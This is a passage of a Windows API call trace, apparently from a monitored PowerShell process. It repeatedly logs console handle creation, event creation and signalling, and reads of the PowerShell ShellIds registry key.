0x6b [0247.264] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0247.269] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f [0247.269] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x6f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0247.270] CloseHandle (hObject=0xf) returned 1 [0247.270] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5e4 [0247.270] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5e0 [0247.270] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5ec [0247.270] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5e8 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5f0 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5f4 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5f8 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x5fc [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x600 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x604 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x608 [0247.271] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x60c [0247.271] SetEvent (hEvent=0x5e8) returned 1 [0247.271] SetEvent (hEvent=0x5e4) returned 1 [0247.272] SetEvent (hEvent=0x5e0) returned 1 [0247.272] SetEvent (hEvent=0x5ec) returned 1 [0247.272] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x610 [0247.272] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x614) returned 0x0 [0247.272] RegQueryValueExW (in: hKey=0x614, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0248.242] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0248.247] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x73 [0248.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x73, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0248.255] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x77 [0248.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x77, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0248.260] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7b [0248.261] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0248.261] CloseHandle (hObject=0xf) returned 1 [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x630 [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x62c [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x638 [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x634 [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x63c [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x640 [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x644 [0248.262] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x648 [0248.263] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x64c [0248.263] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x650 [0248.263] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x654 [0248.263] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x658 [0248.263] SetEvent (hEvent=0x634) returned 1 [0248.263] SetEvent (hEvent=0x630) returned 1 [0248.263] SetEvent (hEvent=0x62c) returned 1 [0248.263] SetEvent (hEvent=0x638) returned 1 [0248.263] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x65c [0248.263] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x660) returned 0x0 [0248.263] RegQueryValueExW (in: hKey=0x660, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0249.173] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0249.177] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x7f [0249.178] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0249.181] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x83 [0249.182] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x83, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0249.185] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x87 [0249.186] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x87, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0249.186] CloseHandle (hObject=0xf) returned 1 [0249.186] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x67c [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x678 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x684 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x680 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x688 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x68c [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x690 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x694 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x698 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x69c [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a0 [0249.187] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a4 [0249.187] SetEvent (hEvent=0x680) returned 1 [0249.187] SetEvent (hEvent=0x67c) returned 1 [0249.188] SetEvent (hEvent=0x678) returned 1 [0249.188] SetEvent (hEvent=0x684) returned 1 [0249.188] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6a8 [0249.188] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x6ac) returned 0x0 [0249.188] RegQueryValueExW (in: hKey=0x6ac, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0250.207] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0250.212] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8b [0250.213] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0250.218] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x8f [0250.218] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x8f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0250.219] ReadFile (in: hFile=0x108, lpBuffer=0x2e1d108, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x10d698, lpOverlapped=0x0 | out: lpBuffer=0x2e1d108*, lpNumberOfBytesRead=0x10d698*=0x400, lpOverlapped=0x0) returned 1 [0250.224] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x93 [0250.224] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x93, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0250.225] CloseHandle (hObject=0xf) returned 1 [0250.225] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6c8 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6c4 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6d0 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6cc [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6d4 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6d8 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6dc [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6e0 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6e4 [0250.226] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6e8 [0250.227] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6ec [0250.227] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f0 [0250.227] SetEvent (hEvent=0x6cc) returned 1 [0250.227] SetEvent (hEvent=0x6c8) returned 1 [0250.227] SetEvent (hEvent=0x6c4) returned 1 [0250.227] SetEvent (hEvent=0x6d0) returned 1 [0250.227] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6f4 [0250.227] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x6f8) returned 0x0 [0250.228] RegQueryValueExW (in: hKey=0x6f8, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0251.340] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0251.346] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x97 [0251.346] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x97, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0251.351] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9b [0251.352] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0251.358] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x9f [0251.358] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x9f, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0251.358] CloseHandle (hObject=0xf) returned 1 [0251.359] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x714 [0251.359] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x710 [0251.359] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x71c [0251.359] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x718 [0251.359] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x720 [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x724 [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x728 [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x72c [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x730 [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x734 [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x738 [0251.360] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x73c [0251.360] SetEvent (hEvent=0x718) returned 1 [0251.360] SetEvent (hEvent=0x714) returned 1 [0251.360] SetEvent (hEvent=0x710) returned 1 [0251.360] SetEvent (hEvent=0x71c) returned 1 [0251.361] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x740 [0251.361] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x744) returned 0x0 [0251.361] RegQueryValueExW (in: hKey=0x744, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0253.300] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0253.314] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa3 [0253.314] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa3, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0253.320] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xa7 [0253.320] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xa7, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0253.326] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xab [0253.326] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xab, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0253.327] CloseHandle (hObject=0xf) returned 1 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x760 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x75c [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x768 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x764 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x76c [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x770 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x774 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x778 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x77c [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x780 [0253.328] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x784 [0253.329] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x788 [0253.329] SetEvent (hEvent=0x764) returned 1 [0253.329] SetEvent (hEvent=0x760) returned 1 [0253.329] SetEvent (hEvent=0x75c) returned 1 [0253.329] SetEvent (hEvent=0x768) returned 1 [0253.329] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x78c [0253.329] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x790) returned 0x0 [0253.329] RegQueryValueExW (in: hKey=0x790, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0254.677] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0254.682] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xaf [0254.683] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xaf, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0254.688] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb3 [0254.688] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb3, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0254.693] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb7 [0254.694] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb7, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0254.694] CloseHandle (hObject=0xf) returned 1 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7ac [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7a8 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b4 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7b0 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7b8 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7bc [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c0 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7c4 [0254.695] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x7c8 [0254.696] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x7cc [0254.696] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7d0 [0254.696] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7d4 [0254.696] SetEvent (hEvent=0x7b0) returned 1 [0254.696] SetEvent (hEvent=0x7ac) returned 1 [0254.696] SetEvent (hEvent=0x7a8) returned 1 [0254.696] SetEvent (hEvent=0x7b4) returned 1 [0254.697] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x7d8 [0254.697] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d6d8 | out: phkResult=0x10d6d8*=0x7dc) returned 0x0 [0254.697] RegQueryValueExW (in: hKey=0x7dc, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x10d65c, lpData=0x0, lpcbData=0x10d658*=0x0 | out: lpType=0x10d65c*=0x0, lpData=0x0, lpcbData=0x10d658*=0x0) returned 0x2 [0255.812] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf [0255.818] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13 [0255.819] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0255.824] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17 [0255.824] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x17, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0255.830] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b [0255.831] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x1b, lpConsoleScreenBufferInfo=0x10d820 | out: lpConsoleScreenBufferInfo=0x10d820) returned 1 [0255.831] CloseHandle (hObject=0xf) returned 1 [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5e0 [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5e4 [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x608 [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x60c [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x610 [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x614 [0255.832] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x67c [0255.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x678 [0255.833] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x684 [0255.833] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x680 [0255.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x688 [0255.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x68c [0255.833] SetEvent (hEvent=0x60c) returned 1 [0255.833] SetEvent (hEvent=0x5e0) returned 1 [0255.833] SetEvent (hEvent=0x5e4) returned 1 [0255.833] SetEvent (hEvent=0x608) returned 1 [0255.833] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc 